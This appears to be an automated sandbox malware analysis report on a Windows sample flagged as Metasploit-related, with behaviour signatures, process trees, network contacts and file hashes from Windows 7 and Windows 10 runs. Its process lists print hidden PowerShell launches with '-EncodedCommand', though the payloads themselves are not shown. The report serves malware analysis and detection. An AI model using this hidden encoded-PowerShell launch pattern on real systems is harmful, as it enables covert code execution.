Analysis Overview
SHA256
ddb66647189270d6046b6c95e30900f83ffe9911e77a918dd50a6f09879d1624
Threat Level: Known bad
The file 03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
MetaSploit
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Enumerates physical storage devices
Unsigned PE
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-22 21:48
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-22 21:48
Reported
2024-06-22 21:50
Platform
win10v2004-20240611-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
MetaSploit
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -window hidden -EncodedCommand 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
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -window hidden -EncodedCommand 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
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc 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
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uzywrygi\uzywrygi.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES414F.tmp" "c:\Users\Admin\AppData\Local\Temp\uzywrygi\CSC2CE0F1BBE9C943938DB8A4B02DA6D6C7.TMP"
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | testme.com | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 72.15.174.6:80 | | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | | udp |
Files
memory/720-0-0x0000000000400000-0x0000000000476000-memory.dmp
memory/3644-1-0x0000000074E7E000-0x0000000074E7F000-memory.dmp
memory/3644-2-0x0000000002ED0000-0x0000000002F06000-memory.dmp
memory/3644-4-0x0000000074E70000-0x0000000075620000-memory.dmp
memory/3644-3-0x0000000005B80000-0x00000000061A8000-memory.dmp
memory/3644-6-0x0000000005970000-0x00000000059D6000-memory.dmp
memory/3644-8-0x0000000074E70000-0x0000000075620000-memory.dmp
memory/3644-5-0x00000000056D0000-0x00000000056F2000-memory.dmp
memory/3644-7-0x0000000005AE0000-0x0000000005B46000-memory.dmp
memory/3644-9-0x00000000061B0000-0x0000000006504000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0rpvq3ti.e51.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3644-19-0x0000000006790000-0x00000000067AE000-memory.dmp
memory/3644-20-0x0000000006830000-0x000000000687C000-memory.dmp
memory/1988-21-0x0000000074E70000-0x0000000075620000-memory.dmp
memory/1988-22-0x0000000074E70000-0x0000000075620000-memory.dmp
memory/1988-32-0x0000000007900000-0x0000000007F7A000-memory.dmp
memory/1988-33-0x0000000006490000-0x00000000064AA000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\uzywrygi\uzywrygi.cmdline
| MD5 | 9b594472d3edd2866e41a9409e174c28 |
| SHA1 | fb712249b60038b2d2b4c690acf70a7c78774281 |
| SHA256 | 962cfab3660f467575af9bd80140232b991b0eb58f8c5ac5cc8e35229376f17c |
| SHA512 | ef277ee443c64be051e9add3a2d2ec818b519223739fababc9806784fb05017e508f4eaf31bfb4bb618a22772048ea358d966302f6095972f3f3466d2901bbaa |
\??\c:\Users\Admin\AppData\Local\Temp\uzywrygi\uzywrygi.0.cs
| MD5 | 7319070c34daa5f6f2ece2dfc07119ee |
| SHA1 | f26a4a48518a5608e93c8b77368f588b0433973c |
| SHA256 | b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc |
| SHA512 | 34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd |
\??\c:\Users\Admin\AppData\Local\Temp\uzywrygi\CSC2CE0F1BBE9C943938DB8A4B02DA6D6C7.TMP
| MD5 | 7b179e0bbe6cdabcb8adb8846f7ab4e8 |
| SHA1 | d7e4dfdf2f378f889f652008abd204c81de3660b |
| SHA256 | 5b850be8355ad0509406ad1d3ced0173a62b7dd4c7004437669fd12f1ac3edec |
| SHA512 | ac5143f24ddace9a581653e8ed80bda120f93544a822a16d3a3552e57f9c666c60075d76e4cbff8b4f10199f23375655fa8a5109565edf84a398d7383d310e35 |
C:\Users\Admin\AppData\Local\Temp\RES414F.tmp
| MD5 | 32301361b323937c28a85c9e3626607b |
| SHA1 | 4476c5069156ae769ee91eef123c51204f20468c |
| SHA256 | e3da5c07c50ac0166d7a7391687a256973c6c59e01a2dc147c376bcb3f383aa6 |
| SHA512 | 5c7cd2b42fed276f134261677fdb3f733e6ae4e45bd9d10a974de93f90440fd75bd93c024e2fe2f4c2bef24f0c032deffb933d62855f9051ebd4d8651c4ef243 |
memory/5004-55-0x0000000006080000-0x0000000006088000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\uzywrygi\uzywrygi.dll
| MD5 | 71bbf2f34607364c50420c9db477d25c |
| SHA1 | 78febc656937380b72684fa09f74d707d5a669eb |
| SHA256 | d3dcc264749ebcef1489722ddd0a1f72547cde119d091b50c53eec33d8b4a9a5 |
| SHA512 | a5d8532c9a8bc43d3d2681e8a96dd67a277d62be5bf90cab9d135132eeccfda570634e803ca87a14fac959e22e1db9559b09841e27387cb72c9ffbc0df4ad139 |
memory/5004-57-0x0000000006CE0000-0x0000000006CE1000-memory.dmp
memory/3644-59-0x0000000074E7E000-0x0000000074E7F000-memory.dmp
memory/3644-60-0x0000000074E70000-0x0000000075620000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | 06ad34f9739c5159b4d92d702545bd49 |
| SHA1 | 9152a0d4f153f3f40f7e606be75f81b582ee0c17 |
| SHA256 | 474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba |
| SHA512 | c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92 |
memory/1988-63-0x0000000074E70000-0x0000000075620000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-22 21:48
Reported
2024-06-22 21:50
Platform
win7-20240508-en
Max time kernel
149s
Max time network
149s
Command Line
Signatures
MetaSploit
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -window hidden -EncodedCommand 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
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -window hidden -EncodedCommand [base64-encoded command omitted]
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc 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
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gnlr-kac.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES38DD.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC38DC.tmp"
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | testme.com | udp |
| TW | 192.72.98.5:80 | | tcp |
Files
memory/1708-0-0x0000000000400000-0x0000000000476000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | b6871bb612b0350b771280f6c95b4902 |
| SHA1 | 68281830cae5ee715ba3d85f46c67db1621f5dcb |
| SHA256 | f5e80d286d077ea62a999e9395b5eb49a3b4fe519100b5db8e2a647b75dabc70 |
| SHA512 | 096393da0d01cb09e77f196fef9769f1bc7f4618e4c2dfccc7e634e57939df08abb01e04340a99faac7e0b14dd9fa949d54c3a63079c6120aefe59be9fd8e010 |
\??\c:\Users\Admin\AppData\Local\Temp\gnlr-kac.cmdline
| MD5 | ac79210adb489947c774aa90662ba787 |
| SHA1 | 90c90291919bcceb605acc62c9319d720580cac4 |
| SHA256 | 83ebaec4c4d3cdc7e55736c5958dbec7aeb4da365a4d96a29564d83f55290afb |
| SHA512 | e304e7afaccdd35510a1636403a64832e164072aa2938650e97c9c70189d13ae7245f8f12e736d5fe59e63bf58d69bb8aeb2f2c00a24d173011029e83c2355bb |
\??\c:\Users\Admin\AppData\Local\Temp\gnlr-kac.0.cs
| MD5 | 7319070c34daa5f6f2ece2dfc07119ee |
| SHA1 | f26a4a48518a5608e93c8b77368f588b0433973c |
| SHA256 | b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc |
| SHA512 | 34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd |
\??\c:\Users\Admin\AppData\Local\Temp\CSC38DC.tmp
| MD5 | f80729650f8f0526c3c5e6c891efee75 |
| SHA1 | 656d8a58d3bf4ad9298f3bc74097a890dc0bf43e |
| SHA256 | 49f6513126f0a42d8152ccf1e58b62c35bcd5c11e6cb58fc07fd8075d4ec1467 |
| SHA512 | 75df3c9dcf5895b49092d61de08ecb938961407dc347df86ba05f4b5d43c0223f0c16ad050871d2e6891a1a67b1f551b2e93c0fe8bc47e556af1ef2b7ec2cfac |
C:\Users\Admin\AppData\Local\Temp\RES38DD.tmp
| MD5 | bc429cab527bdae7fea6482775b95391 |
| SHA1 | 3baab5115b94f7d9c065440200464e6af2a84f91 |
| SHA256 | 5d0162a806205e8661c9fd72a99c3b48af55c0db129c2533cb968daeb9a7948a |
| SHA512 | 73bff415e35c1bb42b02897a5ee983922fb66f103e53c381cf3874bf088a35b5a29ad772a297fda4b25453f2025888b89f5fb21645c2d3bc26a05417b00c54fb |
C:\Users\Admin\AppData\Local\Temp\gnlr-kac.dll
| MD5 | 8ae45b56a4d40070bff2a57010ca829f |
| SHA1 | 07924b4f6fb54b3105d3dfb429bf482cd6609e5a |
| SHA256 | 47d84ae418a90f4120511e78492b0477f1085fc18b7419c63edccaec5ce9625a |
| SHA512 | 159033634a196cda3df156cc11b52b633610b2a5b2cb753a18728485972afaa6a05ff2c9383112e001ae8cdb9d8ff0fa3282bb44308134f8baaf812dc21a3170 |
C:\Users\Admin\AppData\Local\Temp\gnlr-kac.pdb
| MD5 | 80deabb48aef123c006aebcafef01f8d |
| SHA1 | ec14a45d86c617b7cb8974c467205265c35d462f |
| SHA256 | e0cf193162ff37f68e42fdc67ef7eac0ab7f1741ee42d308dafd4f1bda33ecad |
| SHA512 | 6702e163435ee4561c9c32a4c52be897ab3f0db59659f24bc9fb06d222757c3f14f0e3f3f61be77078a0bdc7270aed7450459794a68d13b89e1dfb8826230dff |
memory/2700-28-0x0000000005540000-0x0000000005541000-memory.dmp